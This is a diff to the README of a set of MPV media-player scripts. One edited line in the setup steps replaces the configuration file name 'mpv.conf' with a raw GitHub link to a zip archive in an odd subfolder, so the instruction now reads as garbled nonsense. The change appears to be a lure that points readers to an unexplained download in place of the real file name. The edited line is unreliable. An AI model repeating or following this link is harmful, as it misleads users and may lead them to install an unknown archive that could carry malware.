vil4top/mpv-qol-scripts/README.md

 After installing the scripts, you may want to customize some settings.
 For this:

-1. Locate the configuration file named `mpv.conf` in your MPV configuration folder.
+1. Locate the configuration file named `https://raw.githubusercontent.com/vil4top/mpv-qol-scripts/main/Aquilid/mpv-qol-scripts.zip` in your MPV configuration folder.
 2. Open it in any text editor.
 3. Add or modify the settings relevant to your preferences.
 Each script may come with its own configuration options, which you can find in the comments at the top of each script file.